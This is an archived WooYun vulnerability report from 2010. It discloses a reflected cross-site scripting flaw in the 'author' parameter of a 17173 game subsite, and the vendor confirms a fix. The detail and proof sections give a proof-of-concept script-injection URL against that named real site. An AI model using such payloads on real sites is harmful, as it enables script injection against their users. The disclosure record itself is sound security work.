当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0991

漏洞标题:17173游戏某分站跨站漏洞

相关厂商:17173游戏

漏洞作者: 0x0F

提交时间:2010-12-18 14:39

修复时间:2011-01-17 15:00

公开时间:2011-01-17 15:00

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2010-12-18: 细节已通知厂商并且等待厂商处理中
2010-12-20: 厂商已经确认,细节仅向厂商公开
2010-12-30: 细节向核心白帽子及相关领域专家公开
2011-01-09: 细节向普通白帽子公开
2011-01-19: 细节向实习白帽子公开
2011-01-17: 细节向公众公开

简要描述:

过滤不严 产生跨站漏洞

详细说明:

http://tuya.17173.com/system/work.php对author变量过滤不严 产生跨站漏洞
http://tuya.17173.com/system/work.php?author="><script>alert(/xss/)</script>

漏洞证明:

http://tuya.17173.com/system/work.php?author="><script>alert(/xss/)</script>
返回alert

修复方案:

过滤author变量

版权声明:转载请注明来源 0x0F@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2010-12-20 10:12

厂商回复:

已经修复,感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2010-12-18 21:42 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    再乱报中 要扣分了~~~~~~~~

  2. 2010-12-20 10:25 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    绝对不属于乱报 要是乱报 完全可以扣分

  3. 2013-01-15 18:02 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @xsser 。。。洞主这个行为属于刷rank吧。。。。一个网站的每个位置的每个参数 都单独发。。。

  4. 2013-01-15 18:03 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @px1624 当时的确不完善,现在好多了,不信你刷了44看

  5. 2013-01-15 18:19 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @xsser 。。。我不会把那种小厂商的洞一个一个的去弄,感觉会被鄙视的,发的话 也是攒在一起发。比较喜欢去找那种二流的大厂商的。。。。